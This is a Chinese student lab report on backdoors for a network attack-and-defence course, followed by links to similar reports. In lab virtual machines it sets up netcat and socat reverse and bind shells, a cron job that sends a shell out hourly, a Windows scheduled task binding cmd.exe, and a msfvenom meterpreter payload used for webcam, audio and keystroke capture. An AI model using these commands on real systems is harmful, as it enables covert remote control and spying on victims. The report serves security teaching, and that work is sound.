实验二 后门原理与实践

实验内容

  • (1)使用netcat获取主机操作Shell,cron启动
  • (2)使用socat获取主机操作Shell, 任务计划启动
  • (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
  • (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

实验工具

  • Netcat

又名nc,ncat。是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使用,起到后门的作用。

Linux: 一般自带netcat,"man netcat" 或"man nc"可查看其使用说明。

Windows: 课程主页附件中下载ncat.rar解压即可使用。

  • Socat

netcat增强版,超级netcat工具。

windows版见附件。解压即用,不用安装。

任何代理、转发等功能都可以用该工具实现。

  • Meterpreter

kali机自带,只在kali中用。

具有强大的功能,特别是其socks代理,内网渗透测试神器。

熟悉后门工具

在实验开始前先熟悉一下ncat的使用,使用前确定Linux和Windows都安装好了ncat。

我们的kali机自带,可以直接用man ncat 命令查看。windows7中,直接在浏览器里从 GitHub下载或者从自己机子里拖拽进去。

确定ip地址

首先确定三个端的ip地址。

在本机Windows、虚拟机Win7中命令行中输入指令 ipconfig 查看ip地址,Linux中终端中输入指令 ifconfig 查看ip地址。

如图所见,主机Windows的ip地址为 192.168.199.209 ;

虚拟机Win7的ip地址为 192.168.10.137 ;Linux的ip地址为 192.168.10.136 。

Netcat

1.Windows获得Linux操作shell

windows端进入netcat文件的位置,使用命令行输入 ncat.exe -l   ,打开监听,其中5234为监听的端口。

在Linux中反弹连接Windows, nc 192.168.10.137 -e /bin/sh ,使用 -e 选项执行shell程序,指令中的ip地址为虚拟机Win7的ip地址。

  • Windows成功获得Linux的shell,此时就可以通过windows端的命令行实现对linux的操作了

2.Windows获得Linux操作shell

  • 在Linux终端输入 nc -l -p  打开监听

  • windows反弹连接linux,指令为 ncat.exe -e cmd.exe 192.168.10.136

  • Linux成功获得了Windows的控制权,此时就可以通过linux来控制windows主机了

3.使用netcat传输数据

  • 在windows命令行输入命令:ncat.exe -l ,打开监听

  • 在Linux终端输入nc 192.168.10.137 ,连接到windows的5234端口,此时输入任意语句

  • 成功实现linux和windows之间的数据传输

Meterpreter

  • 后门就是一个程序。
  • 传统的理解是:有人编写一个后门程序,大家拿来用。
  • 后来有一些牛人呢,就想编写一个平台能生成后门程序。这个平台呢,把后门的
    • 基本功能(基本的连接、执行指令)
    • 扩展功能(如搜集用户信息、安装服务等功能)
    • 编码模式
    • 运行平台
    • 以及运行参数
  • 全都做成零件或可调整的参数。用的时候按需要组合,就可以生成一个可执行文件。

这一部分也会在接下来的实验中动手实践的~

实验步骤

一、使用netcat获取主机操作Shell,cron启动

  • Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。详细说明可以"man cron"。

(1)在windows命令行,输入命令 ncat.exe -l -p  ,监听本机的5234端口。

(2)在Linux终端,输入 crontab -e ,编辑一条定时任务,选择3。

(3)vim编辑器中用 i 改为插入模式,在最后一行插入 54 * * * * /bin/netcat 192.168.10.137  -e /bin/sh

后输入 :wq! 保存并退出,上述指令表示在每小时的54分运行此命令。

  • 到时间之后,输入 ls 指令,可以看到windows端已经获得了shell

二、使用Socat获取主机操作Shell, 任务计划启动

socat是ncat的增强版,socat的基本功能就是建立两个双向的字节流,数据就在其间传输,参数address就是代表了其中的一个方向。

作为一款双向数据流通道工具,它拥有许多强大的功能:端口的连接、端口侦听、收发文件、传递shell、端口转发、端口扫描等。

实践前在Windows安装好socat。

(1)在Win7打开控制面板,分别选中 管理工具 、 任务计划程序 、 创建任务

(2)在任务计划程序中创建新任务,填写任务名称,新建一个触发器。

(3)在创建任务中创建新操作,在 程序或脚本 中选择 socat.exe 文件的路径,在添加参数一栏填写 tcp-listen: exec:cmd.exe,pty,stderr 。

这个命令的作用是把 cmd.exe 绑定到端口  ,同时把 cmd.exe 的 stderr 重定向到 stdout 上

找到自己刚刚创建的任务,右键运行,会弹出一个名为 taskeng.exe 的框

(4)锁定计算机,创建的任务开始运行。

(5)在Linux终端输入指令 socat - tcp:192.168.10.137:  ,发现成功获得了cmd shell,能够输入Windows的命令

三、使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

(1)在Linux终端输入指令生成后门程序

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.136 LPORT= -f exe > .exe

其中 192.168.10.136 为虚拟机Linux的ip地址

(2)通过nc传输已经生成的 .exe 程序文件

在Win7中输入:ncat.exe -lv > .exe 监听并接受后门程序;

在Linux中输入: nc 192.168.10.137 < .exe 向Win7传输后门程序。

在Win7中运行后门程序

(3)在Linux中输入指令 msfconsole ,进入msf命令行,msf启动监听前需要进行一些设置

输入以下命令进行设置:

use exploit/multi/handler  /*进入handler模式*/

set payload windows/meterpreter/reverse_tcp  /*对应生成的后门程序设置payload*/

show options  /*查看当前信息状态*/

set LHOST 192.168.10.136  /*设置LHOST,其中ip为Linux的ip*/

set LPORT 5234 /*设置LPORT*/

exploit /*启动监听*/

(4)启动监听后,在win中运行后门程序,此时Linux已经获得了Windows主机的连接,并且得到了远程控制的shell,能够输入Windows中的命令。

四、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

(1)获取目标主机音频

(2)获取目标主机摄像头

显示错误,这是因为win7上没有装驱动。解决方法为:在Win7虚拟机窗口右下角有个摄像头图标,点击图标即可。

再次尝试就成功啦,虽然拍出来的效果有些诡异...(图中是拍了很多次才满意)

(3)获取目标主机击键记录

基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

浏览网站所附带的软件,在不正规的网站下载软件,使用外挂以及盗版的软件。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

win:设置为开机自启动

Linux:将木马设为定时启动

(3)Meterpreter有哪些给你映像深刻的功能?

可以说吊炸天了,可以获取目标主机音频、摄像头、击键记录等内容,我觉得仅仅这几项就对受害者威胁很大了。

(4)如何发现自己有系统有没有被安装后门?

安装专门的杀毒软件,实时防护,并定期检测电脑安全情况。在防火墙看开启的端口及对应的进程,一般不是系统默认开启的端口都是可疑的,要找一下对应的进程, 找到对应进程,对相应进程进行抓包,查看其通信的数据,分析是不是后门。

实验感想

对照老师的教程走一遍难度并不大,所以本次实验总体还是较为顺利的,没有遇到什么大问题。

对于“后门”这个概念,我的认知可能仅限于平时看到的相关新闻了,而本次实验正如其名,不但让我了解其原理还亲自动手去实践,观察攻击者与受害者的行为。

虽然我只是接触到了一些简单的指令,还没有进行更多更深入的了解,但还是深切地感受到了Metasploit的可怕之处。

最大的感想就是......我已经把摄像头给贴住了......当威胁来临的时候想都想不到,所以我们一定要时刻注意自己的信息安全......

2018-2019-2 20165234 《网络对抗技术》 Exp2 后门原理与实践的更多相关文章

  1. 2019-2020-2 20175226 王鹏雲 网络对抗技术 Exp2 后门原理与实践

    2019-2020-2 20175226 王鹏雲 网络对抗技术 Exp2 后门原理与实践 实验内容 使用netcat获取主机操作Shell,cron启动: 使用socat获取主机操作Shell, 任务 ...

  2. 20155326刘美岑 《网络对抗》Exp2 后门原理与实践

    20155326刘美岑 <网络对抗>Exp2 后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启 ...

  3. 20155320《网络对抗》Exp2 后门原理与实践

    20155320<网络对抗>Exp2 后门原理与实践 [实验内容] (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, ...

  4. 20155324《网络对抗》Exp2 后门原理与实践

    20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...

  5. 20155208徐子涵《网络对抗》Exp2 后门原理与实践

    20155208徐子涵<网络对抗>Exp2 后门原理与实践 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 答:当我们在非官方网站上下载软件时,后门极有可能会进入我们 ...

  6. 20145236《网络对抗》Exp2 后门原理与实践

    20145236<网络对抗>Exp2 后门原理与实践 目录: 一.基础问题回答 二.常用后门工具实践 2.1 Windows获得Linux Shell 2.2 Linux获得Windows ...

  7. 20155202 张旭《网络对抗》Exp2 后门原理与实践

    20155202 张旭<网络对抗>Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 捆绑在软件中 注入在可执行文件里 注入在office文件的宏里面 ...

  8. 20155218《网络对抗》Exp2 后门原理与实践

    20155218<网络对抗>Exp2 后门原理与实践 常用后门工具实践 1.Windows获得Linux Shell: 在Windows下,先使用ipconfig指令查看本机IP,使用nc ...

  9. 20155227《网络对抗》Exp2 后门原理与实践

    20155227<网络对抗>Exp2 后门原理与实践 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 在非官方网站下载软件时,后门很可能被捆绑在软件中. 攻击者利用欺 ...

  10. 20155232《网络对抗》Exp2 后门原理与实践

    20155232<网络对抗>Exp2 后门原理与实践 问题回答 1.例举你能想到的一个后门进入到你系统中的可能方式? 通过网页上弹出来的软件自动安装 2.例举你知道的后门如何启动起来(wi ...

随机推荐

  1. nginx正则匹配

    1.通用匹配规则 .     匹配除换行符以外的任意字符 \w  匹配字母.数字.下划线.汉字 \s   匹配任意的空白符 \d   匹配数字 ^    匹配字符串的开始 $    匹配字符串的结束 ...

  2. 8年,从2D到3D,我的学习之路

    Mickey 写了一篇 <一个本科毕业生创业两年的感悟>,从他的视角,总结了我们合作的两年经历. 我也来写一篇,介绍我的学习之路,希望对大家有所帮助,谢谢大家- 我的学习方法 1.直接从0 ...

  3. 转载:img是什么元素?置换元素?

    转载: https://blog.csdn.net/kingliguo/article/details/52643594 img是什么元素? 应是行内元素,判断一个元素是行内元素,还是块元素,无非就是 ...

  4. Mistwald zoj 3497

    链接 [https://vjudge.net/contest/294259#problem/K] 题意 就是有个m*n矩阵 出发(1,1) 出口(m,n) 然后给出每个点能到大的四个位置 而且一旦到达 ...

  5. 如何下载西门子产品CAD、3D和EPLAN文件

    使用CAx下载管理器可以访问产品的最新CAD和CAE数据. 介绍 技术数据中包含一系列产品的尺寸图.可使用CAx下载管理器,如果需要更多信息. 可以在西门子全球支持数据库中快速方便地找到 3D,CAx ...

  6. LR socket协议脚本

    socket协议分为TCP.UDP两种(区别与联系在此不做赘述),一种为长连接.一种为短连接.如果创建连接时在init中对应关闭连接在end中,则为长连接:如果创建关闭连接都是在action则为短连接 ...

  7. sql是最成功的第四代语言

    SQL发展的前世今生 很多年前,两名年轻的IBM研究员将一门关系型语言带到了数据库领域,旨在使用声明性的方式来操作数据.从Don Chamberlin和Ramond Boyce发表"SEQU ...

  8. 快速实现兼容的js复制方式。有点非正规,通过非正规的排版实现。

    <div style="height:1px; width:1px; overflow:hidden; position:absolute;left:-2px;"> & ...

  9. Jetson TX1刷机

    刷机流程 https://blog.csdn.net/c406495762/article/details/70786700 注意:教程中包含两步,首先安装Ubuntu系统,然后重启安装程序,安装其他 ...

  10. bugku web 管理员系统

    页面是一个登陆表单,需要账号密码,首先f12查看源代码,发现有一段可疑的注释,明显是base64,解码得到test123,似乎是一个类似于密码的东西,既然是管理员,就猜测用户名是admin,填上去试一 ...